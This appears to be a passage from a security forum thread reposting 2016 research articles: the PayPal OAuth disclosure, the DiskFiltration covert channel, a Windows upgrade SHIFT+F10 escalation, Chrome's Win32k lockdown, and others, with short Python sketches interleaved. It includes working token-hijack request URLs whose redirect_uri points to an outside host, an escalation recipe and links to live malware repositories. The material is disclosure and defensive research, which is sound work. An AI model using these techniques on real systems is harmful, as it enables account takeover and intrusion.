- KernelMode.info: Free; registration required
- MalShare: Free; registration required
- Malware.lu’s AVCaesar: Free; registration required
- MalwareBlacklist: Free; registration required
- Malware DB: Free
- Malwr: Free; registration required
- Open Malware: Free
- theZoo aka Malware DB: Free
- Virusign: Free
- VirusShare: Free
Be careful not to infect yourself when accessing and experimenting with malicious software! My other lists of online security resources outline Automated Malware Analysis Services and On-Line Tools for Malicious Website Lookups. Also, take a look at my tips on sharing malware samples with other researchers.
Updated November 28, 2016
Sursa: https://zeltser.com/malware-sample-sources/
  16. ATM Insert Skimmers: A Closer Look
KrebsOnSecurity has featured multiple stories about the threat from ATM fraud devices known as “insert skimmers,” wafer-thin data theft tools made to be completely hidden inside a cash machine’s card acceptance slot. For a closer look at how stealthy insert skimmers can be, it helps to see videos of these things being installed and removed. Here’s a look at promotional sales videos produced by two different ATM insert skimmer peddlers.
Traditional ATM skimmers are fraud devices made to be placed over top of the cash machine’s card acceptance slot, usually secured to the ATM with glue or double-sided tape. Increasingly, however, more financial institutions are turning to technologies that can detect when something has been affixed to the ATM. As a result, more fraudsters are selling and using insert skimming devices — which are completely hidden from view once inserted into an ATM.
The fraudster demonstrating his insert skimmer in the short video above spends the first half of the demo showing how a regular bank card can freely move in and out of the card acceptance slot while the insert skimmer is nestled inside. Toward the end of the video, the scammer retrieves the insert skimmer using what appears to be a rather crude, handmade tool thin enough to fit inside a wallet.
A sales video produced by yet another miscreant in the cybercrime underground shows an insert skimmer being installed and removed from a motorized card acceptance slot that has been fully removed from an ATM so that the fraud device can be seen even while it is inserted.
In a typical setup, insert skimmers capture payment card data from the magnetic stripe on the backs of cards inserted into a hacked ATM, while a pinhole spy camera hidden above or beside the PIN pad records time-stamped video of cardholders entering their PINs. The data allows thieves to fabricate new cards and use PINs to withdraw cash from victim accounts.
Covering the PIN pad with your hand blocks any hidden camera from capturing your PIN — and hidden cameras are used in the vast majority of the more than three dozen ATM skimming incidents that I’ve covered here. Shockingly, few people bother to take this simple and effective step, as detailed in this skimmer tale from 2012, wherein I obtained hours worth of video seized from two ATM skimming operations and saw customer after customer walk up, insert their cards and punch in their digits — all in the clear.
Once you understand how stealthy these ATM fraud devices are, it’s difficult to use a cash machine without wondering whether the thing is already hacked. The truth is most of us probably have a better chance of getting physically mugged after withdrawing cash than encountering a skimmer in real life. However, here are a few steps we can all take to minimize the success of skimmer gangs.
- Cover the PIN pad while you enter your PIN.
- Keep your wits about you when you’re at the ATM, and avoid dodgy-looking and standalone cash machines in low-lit areas, if possible.
- Stick to ATMs that are physically installed in a bank. Stand-alone ATMs are usually easier for thieves to hack into.
- Be especially vigilant when withdrawing cash on the weekends; thieves tend to install skimming devices on a weekend — when they know the bank won’t be open again for more than 24 hours.
- Keep a close eye on your bank statements, and dispute any unauthorized charges or withdrawals immediately.
If you liked this piece and want to learn more about skimming devices, check out my series All About Skimmers.
Sursa: https://krebsonsecurity.com/2016/11/atm-insert-skimmers-a-closer-look/
  17. Monday, 28 November 2016
All your Paypal OAuth tokens belong to me - localhost for the win
tl;dr I was able to hijack the OAuth tokens of EVERY Paypal OAuth application with a really simple trick.
Introduction
If you have been following this blog you might have got tired of how many times I have stressed the importance of the redirect_uri parameter in the OAuth flow. This simple parameter can be a source of many headaches for any maintainer of an OAuth installation, be it a client or a server. At the risk of repeating myself, here are two simple suggestions that may help you stay away from trouble (you can always skip this part and go directly to the Paypal Vulnerability section):
If you are building an OAuth client, thou shalt register a redirect_uri that is as specific as you can, i.e. if your OAuth client callback is https://yourouauthclient.com/oauth/oauthprovider/callback then DO register https://yourouauthclient.com/oauth/oauthprovider/callback, NOT JUST https://yourouauthclient.com/ or https://yourouauthclient.com/oauth. If you are still not convinced, here is how I hacked Google leveraging this mistake.
The second suggestion is: the ONLY safe validation method for redirect_uri the authorization server should adopt is exact matching. Although other methods offer client developers desirable flexibility in managing their application’s deployment, they are exploitable. From “OAuth 2 In Action” by Justin Richer and Antonio Sanso, Copyright 2016.
Again, here you can find examples of providers that were vulnerable to this attack: Egor Homakov hacking Github, and me/myself hacking Facebook by bypassing the regex redirect_uri validation.
Paypal Vulnerability
So after this long premise the legitimate question is: what was wrong with Paypal? Basically, like many online internet services, Paypal offers the option to register your own Paypal application via a Dashboard. So far so good :).
The better news (for Paypal) is that they actually employ an exact matching policy for redirect_uri. So what was wrong? While testing my own OAuth client I noticed something a bit fishy. The easiest way to describe it is using an OAuth application from Paypal itself (remember, the vulnerability I found is universal, aka it worked with every client!). Basically Paypal has set up a demo Paypal application to showcase their OAuth functionality. The initial OAuth request looked like:
https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid profile email address phone https://uri.paypal.com/services/paypalattributes https://uri.paypal.com/services/paypalattributes/business https://uri.paypal.com/services/expresscheckout&redirect_uri=https://demo.paypal.com/loginsuccessful&nonce=&newUI=Y
As you can see, the registered redirect_uri for this application is https://demo.paypal.com/loginsuccessful. What I found out is that the Paypal Authorization Server was also accepting localhost as redirect_uri. So
https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid profile email address phone https://uri.paypal.com/services/paypalattributes https://uri.paypal.com/services/paypalattributes/business https://uri.paypal.com/services/expresscheckout&redirect_uri=https://localhost&nonce=&newUI=Y
was still a valid request, and the authorization code was then delivered back to localhost. Cute right?
But still not a vulnerability. Well, the next natural step was to create a DNS entry for my website looking like http://localhost.intothesymmetry.com/ and try:
https://www.paypal.com/signin/authorize?client_id=AdcKahCXxhLAuoIeOotpvizsVOX5k2A0VZGHxZnQHoo1Ap9ChOV0XqPdZXQt&response_type=code&scope=openid profile email address phone https://uri.paypal.com/services/paypalattributes https://uri.paypal.com/services/paypalattributes/business https://uri.paypal.com/services/expresscheckout&redirect_uri=http://localhost.intothesymmetry.com/&nonce=&newUI=Y
and you know what? BINGO:
So it really looks like that even if Paypal did actually perform exact matching validation, localhost was a magic word and it overrode the validation completely!!! Worth repeating: this vulnerability worked for any Paypal OAuth client, hence it was universal, making my initial claim "All your Paypal tokens belong to me - localhost for the win" not so crazy anymore. For more follow me on Twitter.
Disclosure timeline
08-09-2016 - Reported to Paypal security team.
26-09-2016 - Paypal replied this is not a vulnerability!!
26-09-2016 - I replied to Paypal saying ok, no problem. Are you sure you do not want to give an extra look into it?
28-09-2016 - Paypal replied they will give it another try.
07-11-2016 - Paypal fixed the issue (bounty awarded).
28-11-2016 - Public disclosure.
Acknowledgement
I would like to thank the Paypal security team for the constant and quick support.
Posted by Antonio Sanso at 02:00
Sursa: http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html
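The fix is conceptually tiny. A minimal sketch of what strict exact-match redirect_uri validation looks like on the authorization-server side (the client_id and the registry dict below are hypothetical, not PayPal's actual code):

```python
# Hypothetical client registry: each client_id maps to its registered redirect_uri.
REGISTERED = {"client123": "https://demo.paypal.com/loginsuccessful"}

def redirect_uri_is_valid(client_id: str, redirect_uri: str) -> bool:
    """Exact string comparison only: no prefix matching, no regex,
    and crucially no special cases such as 'localhost'."""
    return REGISTERED.get(client_id) == redirect_uri
```

With this check, both https://localhost and http://localhost.intothesymmetry.com/ would have been rejected, because neither is byte-for-byte equal to the registered URI.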
  18. DiskFiltration: Data Exfiltration from Speakerless Air-Gapped Computers via Covert Hard Drive Noise
Mordechai Guri, Yosef Solewicz, Andrey Daidakulov, Yuval Elovici
(Submitted on 11 Aug 2016)
Air-gapped computers are disconnected from the Internet physically and logically. This measure is taken in order to prevent the leakage of sensitive data from secured networks. In the past, it has been shown that malware can exfiltrate data from air-gapped computers by transmitting ultrasonic signals via the computer's speakers. However, such acoustic communication relies on the availability of speakers on a computer. In this paper, we present 'DiskFiltration,' a covert channel which facilitates the leakage of data from an air-gapped computer via acoustic signals emitted from its hard disk drive (HDD). Our method is unique in that, unlike other acoustic covert channels, it doesn't require the presence of speakers or audio hardware in the air-gapped computer. A malware installed on a compromised machine can generate acoustic emissions at specific audio frequencies by controlling the movements of the HDD's actuator arm. Digital information can be modulated over the acoustic signals and then be picked up by a nearby receiver (e.g., smartphone, smartwatch, laptop, etc.). We examine the HDD anatomy and analyze its acoustical characteristics. We also present signal generation and detection, and data modulation and demodulation algorithms. Based on our proposed method, we developed a transmitter on a personal computer and a receiver on a smartphone, and we provide the design and implementation details. We also evaluate our covert channel on various types of internal and external HDDs in different computer chassis and at various distances.
With DiskFiltration we were able to covertly transmit data (e.g., passwords, encryption keys, and keylogging data) from air-gapped computers to a smartphone at an effective bit rate of 180 bits/minute (10,800 bits/hour) and a distance of up to two meters (six feet).
Subjects: Cryptography and Security (cs.CR)
Cite as: arXiv:1608.03431 [cs.CR] (or arXiv:1608.03431v1 [cs.CR] for this version)
Submission history
From: Mordechai Guri [view email]
[v1] Thu, 11 Aug 2016 12:06:12 GMT (3304kb)
Sursa: https://arxiv.org/abs/1608.03431
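As a toy illustration of how digital data can be modulated over tones (the general frequency-shift-keying idea behind such acoustic channels; the frequencies and helper names below are my own assumptions, not the paper's actual parameters):

```python
# Toy frequency-shift-keying sketch: map each bit to one of two tone
# frequencies. In DiskFiltration the "tones" come from HDD actuator-arm
# movement; here they are just numbers, for illustration only.
F0, F1 = 2100.0, 2200.0  # Hz: "0" tone and "1" tone (assumed values)

def modulate(bits: str) -> list:
    """Encode a bit string as a sequence of tone frequencies."""
    return [F1 if b == "1" else F0 for b in bits]

def demodulate(tones: list) -> str:
    """Decode tones back to bits by nearest-frequency decision.
    A real receiver would recover the tones from an FFT of the recording."""
    return "".join("1" if abs(f - F1) < abs(f - F0) else "0" for f in tones)
```

The paper's contribution is making a hard drive emit such tones at all, plus the signal detection and framing needed to reach 180 bits/minute reliably; the mapping above only shows the modulation concept.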
  19. Monday, November 28, 2016
Every Windows 10 in-place Upgrade is a SEVERE Security risk
This is a big issue and it has been there for a long time. Just a month ago I finally got verification that the Microsoft Product Groups not only know about this but that they have begun working on a fix. As I want to be known as a white hat, I had to wait for this to happen before I blog this. There is a small but CRAZY bug in the way the "Feature Update" (previously known as "Upgrade") is installed. The installation of a new build is done by reimaging the machine, and the image is installed by a small version of Windows called Windows PE (Preinstallation Environment). This has a feature for troubleshooting that allows you to press SHIFT+F10 to get a Command Prompt. This sadly allows access to the hard disk because, during the upgrade, Microsoft disables BitLocker. I demonstrate this in the following video. This would take place when you take the following update paths:
- Windows 10 RTM --> 1511 or 1607 release (November Update or Anniversary Update)
- Any build to a newer Insider Build (up to end of October 2016 at least)
The real issue here is the Elevation of Privilege that takes a non-admin to SYSTEM (the root of Windows) even on a BitLocker (Microsoft's hard disk encryption) protected machine. And of course that this doesn't require any external hardware or additional software.
It's just a crazy bug, I would say. Here's the video:
Why would a bad guy do this:
- An internal threat who wants to get admin access just has to wait for the next upgrade, or convince someone it's OK for him to be an Insider
- An external threat with access to a computer waits for it to start an upgrade to get into the system
I sadly can't offer solutions better than:
- Don't allow unattended upgrades
- Keep a very tight watch on the Insiders
- Stick to the LTSB version of Windows 10 for now
I am known to share how I do things myself and I'm happy to say I have instructed my customers to stay on the Long-Term Servicing Branch for now. At least they can wait until this is fixed and move to a more current branch then. I meet people all the time who say that LTSB is a legacy way, but when I say I'm going to wait a year or two to get the worst bugs out of this new "Just upgrade" model - this is what I meant…
Posted by Sami Laiho at 6:14 PM
Sursa: http://blog.win-fu.com/2016/11/every-windows-10-in-place-upgrade-is.html
  20. By Fahmida Y. Rashid, Senior Writer
CERT to Microsoft: Keep EMET alive
Windows systems with the Enhanced Mitigation Experience Toolkit properly configured are more secure than a standalone Windows 10 system, says CERT
InfoWorld | Nov 29, 2016
Microsoft wants to stop supporting its Enhanced Mitigation Experience Toolkit (EMET) because all of the security features have been baked into Windows 10. A vulnerability analyst says Windows with EMET offers additional protection not available in standalone Windows 10. "Even a Windows 7 system with EMET configured protects your application more than a stock Windows 10 system," said Will Dormann, a vulnerability analyst with the Computer Emergency Response Team (CERT) at Carnegie Mellon University’s Software Engineering Institute.
Originally introduced in 2009, EMET adds exploit mitigations, including address space layout randomization (ASLR) and data execution prevention (DEP), to Windows systems to make it harder for malware to trigger unpatched vulnerabilities. Since Windows 10 includes EMET’s anti-exploit protections by default, Microsoft is planning to end-of-life the free tool in July 2018. CERT’s Dormann said Microsoft should keep supporting the toolkit because Windows 10 does not provide all of the application-specific mitigations available in EMET. “Windows 10 does indeed provide some nice exploit mitigations. The problem is that the software you are running needs to be specifically compiled to take advantage of them,” Dormann said.
OS-level vs application-level defenses
Dormann argues that Microsoft should keep supporting the toolkit -- currently EMET 5.51 -- because it provides both systemwide protection and application-specific mitigations that make the toolkit relevant for Windows security, even on Windows 10 systems. EMET’s systemwide protections include the aforementioned ASLR and DEP, Structured Exception Handler Overwrite Protection (SEHOP), Certificate Trust (Pinning), and Block Untrusted Fonts. EMET’s application-specific protections include DEP, SEHOP, ASLR, Null Page Allocation, Heapspray Allocations, Export Address Table Access Filtering (EAF), Export Address Table Access Filtering Plus (EAF+), Bottom-up Randomization (BottomUp ASLR), Attack Surface Reduction (ASR), Block Untrusted Fonts, and Return-Oriented Programming mitigations.
Microsoft’s principal lead program manager for OS security, Jeffrey Sutherland, recently said that users should upgrade to Windows 10 since the latest operating system natively includes the security features provided by EMET. That is true to some extent, as DEP, SEHOP, ASLR, BottomUp ASLR, and ROP mitigation (as Control Flow Guard) are part of Windows 10, but many of the application-specific mitigations are not. What Sutherland neglected to consider was that most Windows administrators rely on EMET to apply all of the available exploit mitigations to applications. Consider that a Windows 10 system with EMET properly configured has 13 more mitigations -- the application-specific controls -- than a standalone Windows 10 system. "It is pretty clear that an application running on a stock Windows 10 system does not have the same protections as one running on a Windows 10 system with EMET properly configured," Dormann said.
Application defenses still lagging
Windows 10 may be the most secure Windows ever, but applications have to be compiled to use the exploit mitigation features to actually benefit from those enhanced security features.
For example, if the application isn’t designed to use Control Flow Guard, then the application doesn’t benefit from Return-Oriented Programming (ROP) defenses, despite the fact that Control Flow Guard is part of Windows 10. "Out of all of the applications you run in your enterprise, do you know which ones are built with Control Flow Guard support? If an application is not built to use Control Flow Guard, it doesn't matter if your underlying operating system supports it or not," Dormann said. The problem isn’t limited to third-party and custom enterprise applications, as there are older -- but still widely used -- Microsoft applications that don’t access the advanced exploit mitigations. For example, Microsoft does not compile all of Office 2010 with the /DYNAMICBASE flag to indicate compatibility with ASLR. An attacker could potentially bypass ASLR and exploit a memory corruption vulnerability by loading a malicious library into the vulnerable application’s process space. Ironically, administrators would protect the application from being targeted in this way by running EMET with application-specific mitigations. "Because we cannot rely on all software vendors to produce code that uses all the exploit mitigations available, EMET puts this control back in our hands," Dormann said. Don’t pick sides; do both Microsoft says to start migrating to Windows 10 and stop using EMET by 2018. A senior engineer at CERT, tasked by the United States Department of Homeland Security to make security recommendations of national significance, says EMET still offers better security than standalone Windows 10. What is a Windows administrator to do? The answer, according to Dormann, is to follow both recommendations: Upgrade to Windows 10 to take advantage of native exploit mitigation features, and install EMET to apply application-specific mitigations. 
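Dormann's question -- do you know which of your applications are built with Control Flow Guard support? -- can be answered by inspecting a binary's PE header. Here is a hedged sketch (my own code, not CERT's or Microsoft's) that reads the DllCharacteristics field; the flag values come from the PE/COFF specification:

```python
import struct

# DllCharacteristics flags from the PE/COFF spec:
DYNAMIC_BASE, NX_COMPAT, GUARD_CF = 0x0040, 0x0100, 0x4000

def mitigation_flags(data: bytes) -> dict:
    """Report which compile-time mitigations a PE image opted into."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]  # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    # DllCharacteristics sits 70 bytes into the optional header, which
    # follows the 4-byte signature and the 20-byte COFF header
    # (same offset for both PE32 and PE32+).
    chars = struct.unpack_from("<H", data, pe_off + 24 + 70)[0]
    return {"aslr": bool(chars & DYNAMIC_BASE),   # /DYNAMICBASE
            "dep": bool(chars & NX_COMPAT),       # /NXCOMPAT
            "cfg": bool(chars & GUARD_CF)}        # /guard:cf
```

Running this over the EXEs and DLLs deployed in an enterprise would show exactly which images lack /DYNAMICBASE (the Office 2010 problem described above) or Control Flow Guard support.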
EMET will continue to work even after its end-of-life date, which means administrators can still use the tool to protect unsupported software against possible zero-day vulnerabilities. Several other Microsoft applications are nearing their end-of-life dates, including Microsoft Office 2007. Administrators can continue to use EMET to protect these applications from attacks looking for zero-day vulnerabilities. “With such out-of-support applications, it is even more important to provide additional exploit protection with a product like EMET,” Dormann said.
It’s possible that with Microsoft’s new Windows-as-a-service model, the remaining EMET defenses will be added to Windows 10 before the end-of-life date, at which point Windows 10 would be able to handle the application-specific protections without EMET. Until then, EMET is “still an important tool to help prevent exploitation of vulnerabilities,” Dormann said.
Sursa: http://www.infoworld.com/article/3145565/security/cert-to-microsoft-keep-emet-alive.html#tk.rss_security
  21. Fldbg, a Pykd script to debug FlashPlayer
November 29, 2016 | Exploit Development, Offensive Security
A few months ago, we decided to make a new module for our Advanced Windows Exploitation class. After evaluating a few options we chose to work with an Adobe Flash 1day vulnerability originally discovered by the Google Project Zero team. Since we did not have any previous experience with Flash internals, we expected a pretty steep learning curve. We started by trying to debug the Flash plugin on Firefox while running the proof-of-concept (PoC) file and quickly realized that debugging the player can be rather time consuming without appropriate tools, for multiple reasons.
First of all, the FlashPlayerPlugin.exe process is spawned by Firefox through the help of an auxiliary process named plugin-container.exe. The latter facilitates communication between the Flash plugin process and the Firefox browser process. Additionally, if protected mode is enabled (default behavior), the FlashPlayerPlugin.exe acts as a broker process and loads a second instance of the player in a sandboxed environment. This sandboxed instance is responsible for the parsing and rendering of Flash content. Most of the functions responsible for rendering Flash content, including the code exploited in our PoC, are wrapped in the NPSWF32_X_X_X_X dynamic library (DLL), which is loaded by FlashPlayerPlugin.exe.
As a result, to successfully debug our process, we need to explicitly inform the debugger that we want it to debug processes spawned by Firefox. Furthermore, in order to set breakpoints on NPSWF32 functions, we need to intercept the point at which the second instance of FlashPlayerPlugin is loaded (the sandboxed process), which is the one that loads our target DLL. All of these preliminary tasks could easily be automated directly from WinDbg.
However, since we realized that we would need to automate other functionality as well, we decided to start writing a pykd script that would facilitate debugging the Flash player on Firefox in a less painful way. One of the problems you encounter when working with the Flash player is the ability to dynamically analyze the ActionScript client code by setting appropriate breakpoints. The ActionScript 3 architecture runs on the ActionScript Virtual Machine 2 (AVM2) engine, and computation in the AVM2 is based on executing the code of a “method body”. As explained in Haifei Li’s paper “Inside AVM”, a method can be identified from its MethodInfo class as:
- Native – a function in the Flash .text section
- “Normal” – our own code in the AS3 source converted to native code through the Just-In-Time (JIT) compiler
- Static init – executed in interpreter mode.
Since there are no symbols exported for native functions and AS3 client code is dynamically translated into processor-specific instructions at runtime, tracing the execution flow can be quite challenging. We decided to take an approach similar to the one exposed in “Discover Flash Player Zero-day Attacks In The Wild From Big Data”, where we hook specific functions in the NPSWF32 library to be able to resolve native and jitted methods. Specifically, we hook BaseExecMgr::setJit and BaseExecMgr::setNative, which we dynamically identify in NPSWF32 by comparing their opcode signatures with the ones found in the compiled avmplus code.
Articol complet: https://www.offensive-security.com/vulndev/fldbg-a-pykd-script-to-debug-flashplayer/
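The opcode-signature matching described above can be illustrated with a small helper that scans a code blob for a byte pattern in which some positions are wildcards. This is a sketch of the general technique, not Fldbg's actual code, and the signature bytes in the example are made up (Fldbg derives its real signatures from compiled avmplus code):

```python
def find_signature(code: bytes, sig: list) -> int:
    """Return the offset of the first match of sig in code, or -1.
    sig entries are either byte values (ints) or None for a wildcard,
    so compiler-dependent bytes (addresses, offsets) can be skipped."""
    n = len(sig)
    for i in range(len(code) - n + 1):
        if all(s is None or code[i + j] == s for j, s in enumerate(sig)):
            return i
    return -1
```

In a pykd script, the returned offset plus the NPSWF32 module base would give the address at which to set a breakpoint on the matched function.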
  22. InsecureBankv2 – Vulnerable Android Application
Information security awareness training may include several demos that describe how an attacker may exploit vulnerabilities in a system to gain full control of remote devices. If you are looking to demonstrate an Android application, you can use InsecureBankv2. This tool was updated during the Black Hat Arsenal and is available online; the purpose of this project is to provide security enthusiasts and developers a way to learn about Android insecurities by testing this vulnerable application. The list of vulnerabilities currently included in this release is:
- Flawed broadcast receivers
- Weak authorization mechanism
- Root detection and bypass
- Local encryption issues
- Vulnerable activity components
- Insecure content provider access
- Insecure webview implementation
- Weak cryptography implementation
- Application patching
- Sensitive information in memory
You can read more and download the tool over here: https://github.com/dineshshetty/
Sursa: http://www.sectechno.com/insecurebankv2-vulnerable-android-application/
  23. Cosa Nostra
Cosa Nostra is an open source software clustering toolkit with a focus on malware analysis. It can create phylogenetic trees of binary malware samples that are structurally similar. It was initially released during SyScan360 Shanghai (2016).
Getting started
Required 3rd party tools
In order to use Cosa Nostra you will need the source code, of course, a 2.7 version of Python, as well as one of the following tools in order to perform code analysis:
- Pyew: written in Python, it supports analysis of PE, ELF, BIOS and boot files for x86 or x86_64.
- IDA: written in C++. It supports analysing a plethora of executable types that you have probably never even heard of. Commercial product.
- Radare2: written in pure C. Same as with IDA, with support for extremely rare CPUs and binary formats. Also, it's open source!
Link: https://github.com/joxeankoret/cosa-nostra
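As a rough illustration of what clustering "structurally similar" samples can mean (this is a sketch of the general idea, not Cosa Nostra's actual algorithm), each sample can be represented as a set of structural features, such as function hashes extracted by one of the analysis tools above, and samples whose feature sets overlap enough get grouped together:

```python
def jaccard(a: set, b: set) -> float:
    """Jaccard similarity of two feature sets (1.0 = identical)."""
    return len(a & b) / len(a | b) if a | b else 0.0

def cluster(samples: dict, threshold: float = 0.5) -> list:
    """Greedy single-link clustering of {name: feature_set} items:
    a sample joins the first cluster containing a similar-enough member."""
    clusters = []
    for name, feats in samples.items():
        for c in clusters:
            if any(jaccard(feats, samples[m]) >= threshold for m in c):
                c.append(name)
                break
        else:
            clusters.append([name])
    return clusters
```

A phylogenetic tree then comes from applying such a similarity measure hierarchically, so that closely related variants end up on neighboring branches.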
  24. NEUTRALIZING INTEL’S MANAGEMENT ENGINE
by: Brian Benchoff, November 28, 2016
Five or so years ago, Intel rolled out something horrible. Intel’s Management Engine (ME) is a completely separate computing environment running on Intel chipsets that has access to everything. The ME has network access, access to the host operating system, memory, and cryptography engine. The ME can be used remotely even if the PC is powered off. If that sounds scary, it gets even worse: no one knows what the ME is doing, and we can’t even look at the code. When — not ‘if’ — the ME is finally cracked open, every computer running on a recent Intel chip will have a huge security and privacy issue. Intel’s Management Engine is the single most dangerous piece of computer hardware ever created.
Researchers are continuing work on deciphering the inner workings of the ME, and we sincerely hope this Pandora’s Box remains closed. Until then, there’s now a new way to disable Intel’s Management Engine.
Previously, the first iteration of the ME found in GM45 chipsets could be removed. This was possible because the ME was located on a chip separate from the northbridge. For Core i3/i5/i7 processors, the ME is integrated into the northbridge. Until now, efforts to disable an ME this closely coupled to the CPU have failed. Completely removing the ME from these systems is impossible; however, disabling parts of the ME is not. There is one caveat: if the ME’s boot ROM (stored in an SPI flash) does not find a valid Intel signature, the PC will shut down after 30 minutes.
A few months ago, [Trammell Hudson] discovered that erasing the first page of the ME region did not shut down his Thinkpad after 30 minutes. This led [Nicola Corna] and [Federico Amedeo Izzo] to write a script that uses this exploit. Effectively, the ME still thinks it’s running, but it doesn’t actually do anything. With a BeagleBone, an SOIC-8 chip clip, and a few breakout wires, this script will run and effectively disable the ME.
This exploit has only been confirmed to work on Sandy Bridge and Ivy Bridge processors. It should work on Skylake processors, and Haswell and Broadwell are untested. Separating or disabling the ME from the CPU has been a major focus of the libreboot and coreboot communities. The inability to do so has, until now, made the future prospects of truly free computing platforms grim. The ME is in everything, and CPUs without an ME are getting old. Even though we don’t have the ability to remove the ME, disabling it is the next best thing. Sursa: https://hackaday.com/2016/11/28/neutralizing-intels-management-engine/
  25. Tuesday, November 29, 2016
Breaking the Chain
Posted by James Forshaw, Wielder of Bolt Cutters.
Much as we’d like it to be true, it seems undeniable that we’ll never fix all security bugs just by looking for them. One of the most productive ways of dealing with this fact is to implement exploit mitigations. Project Zero considers mitigation work just as important as finding vulnerabilities. Sometimes we can get our hands dirty, such as helping out Adobe and Microsoft with Flash mitigations. Sometimes we can only help indirectly via publishing our research and giving vendors an incentive to add their own mitigations.
This blog post is about an important exploit mitigation I developed for Chrome on Windows. It will detail many of the challenges I faced when trying to get this mitigation released to protect end-users of Chrome. It recently shipped to users of Chrome on Windows 10 (in M54), and ended up blocking the sandbox escape of an exploit chain being used in the wild. For information on the Chromium bug that contains the list of things we implemented in order to get this mitigation working, look here.
The Problem with Win32k
It’s possible to lock down a sandbox such as Chrome’s pretty comprehensively using Restricted Tokens. However, one of the big problems on Windows is locking down access to system calls. On Windows you have both the normal NT system calls and the Win32k system calls for accessing the GUI, which combined represent a significant attack surface. While the NT system calls do have exploitable vulnerabilities now and again (for example issue 865), it’s nothing compared to Win32k. From just one research project alone 31 issues were discovered, and this isn’t counting the many font issues Mateusz has found and the hundreds of other issues found by other researchers. Much of Win32k’s problems come from history. In the first versions of Windows NT almost all the code responsible for the windowing system existed in user mode.
Unfortunately for 90’s-era computers this wasn’t exactly good for performance, so for NT 4 Microsoft moved a significant portion of what was user-mode code into the kernel (becoming the driver win32k.sys). This was a time before Slammer, before Blaster, before the infamous Trustworthy Computing memo which pushed Microsoft to think about security first. Perhaps some lone voice spoke for security that day, but was overwhelmed by performance considerations. We’ll never know for sure; however, what it did do was make Win32k a large fragile mess which seems to have persisted to this day. And the attack surface this large fragile mess exposed could not be removed from any sandboxed process.
That all changed with the release of Windows 8. Microsoft introduced the System Call Disable Policy, which allows a developer to completely block access to the Win32k system call table. While it doesn’t do anything for normal system calls, the fact that you could eliminate over a thousand Win32k system calls, many of which have had serious security issues, would be a crucial reduction in the attack surface. However, no application in a default Windows installation used this policy (it’s said to have been introduced for non-GUI applications such as on Azure) and using it for something as complex as Chrome wasn’t going to be easy. The process of shipping Win32k lockdown required a number of architectural changes to be made to Chrome. This included replacing the GDI-based font code with Microsoft’s DirectWrite library. After around two years of effort, Win32k lockdown was shipping by default.
The Problems with Flash in Chrome
Chrome uses a multi-process model, in which web page content is parsed inside Renderer processes, which are covered by the Win32k Lockdown policy for the Chrome sandbox. Plugins such as Flash and PDFium load into a different type of process, a PPAPI process, and due to circumstance these could not have the lockdown policy enabled.
This would seem a pretty large weak point. Flash has not had the best security track record (relevant), making the likelihood of Flash being an RCE vector very high. Combine that with the relative ease of finding and exploiting Win32k vulnerabilities and you've got a perfect storm. It would seem reasonable to assume that real attackers were finding Win32k vulnerabilities and using them to break out of restrictive sandboxes, including Chrome's, with Flash as the RCE vector. The question was whether that was true.

The first real confirmation came from the Hacking Team breach in July 2015. In the dumped files was an unfixed Chrome exploit which used Flash as the RCE vector and a Win32k exploit to escape the sandbox. While both vulnerabilities were quickly fixed, it gave me the idea that perhaps I could spend some time implementing the lockdown policy for PPAPI and eliminate this entire attack chain.

Analysing the Problem

The first thing I needed to do was determine which Win32k APIs were used by a plugin such as Flash. There are three main system DLLs an application can call which end up issuing system calls to Win32k: USER32, GDI32 and IMM32, each with slightly different responsibilities. The aim would be to enumerate all calls to these DLLs and replace them with APIs which don't rely on Win32k. Still, it wasn't just Flash that might call Win32k APIs, but also the Pepper APIs implemented in Chrome.

I took two approaches to finding the code I needed to remove: import inspection and dynamic analysis. Import inspection is fairly simple: I just dumped the imports of the plugins, such as the Pepper Flash plugin DLL, and identified anything which came from the core windowing DLLs. I then ran Flash and PDFium with a number of different files to try and exercise the code paths which used Win32k system calls.
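The import-inspection step is easy to reproduce with `dumpbin /imports` or a library like pefile; as a self-contained illustration, here is a stdlib-only sketch that walks a PE file's import directory and flags anything coming from the windowing DLLs. Everything below is my own sketch (including the synthetic build_demo_pe image, which stands in for a real plugin DLL), not tooling from the post.

```python
import struct

# DLLs whose imports indicate Win32k-reachable code paths.
WINDOWING_DLLS = {b"user32.dll", b"gdi32.dll", b"imm32.dll"}

def rva_to_off(sections, rva):
    """Map a relative virtual address to a file offset via the section table."""
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return raw_ptr + (rva - va)
    raise ValueError(f"RVA {rva:#x} not mapped by any section")

def imported_dlls(pe: bytes):
    """Return the DLL names listed in a PE image's import directory."""
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    assert pe[e_lfanew:e_lfanew + 4] == b"PE\0\0", "not a PE image"
    coff = e_lfanew + 4
    (nsections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    (magic,) = struct.unpack_from("<H", pe, opt)
    dirs = opt + (96 if magic == 0x10B else 112)          # PE32 vs PE32+
    imp_rva, _ = struct.unpack_from("<II", pe, dirs + 8)  # data directory 1: imports
    sections = []
    for i in range(nsections):
        vsize, va, raw_size, raw_ptr = struct.unpack_from(
            "<IIII", pe, opt + opt_size + i * 40 + 8)
        sections.append((va, vsize, raw_ptr, raw_size))
    names, desc = [], rva_to_off(sections, imp_rva)
    while True:  # IMAGE_IMPORT_DESCRIPTORs end with an all-zero entry
        entry = struct.unpack_from("<IIIII", pe, desc)
        if not any(entry):
            return names
        name_off = rva_to_off(sections, entry[3])         # Name field is an RVA
        names.append(pe[name_off:pe.index(b"\0", name_off)])
        desc += 20

def build_demo_pe(dll_names):
    """Build a synthetic PE32+ image with just enough structure for the parser."""
    va, raw_ptr = 0x1000, 0x200
    ndesc = len(dll_names) + 1                            # plus the terminator
    name_rvas, blob = [], b""
    for n in dll_names:
        name_rvas.append(va + ndesc * 20 + len(blob))
        blob += n + b"\0"
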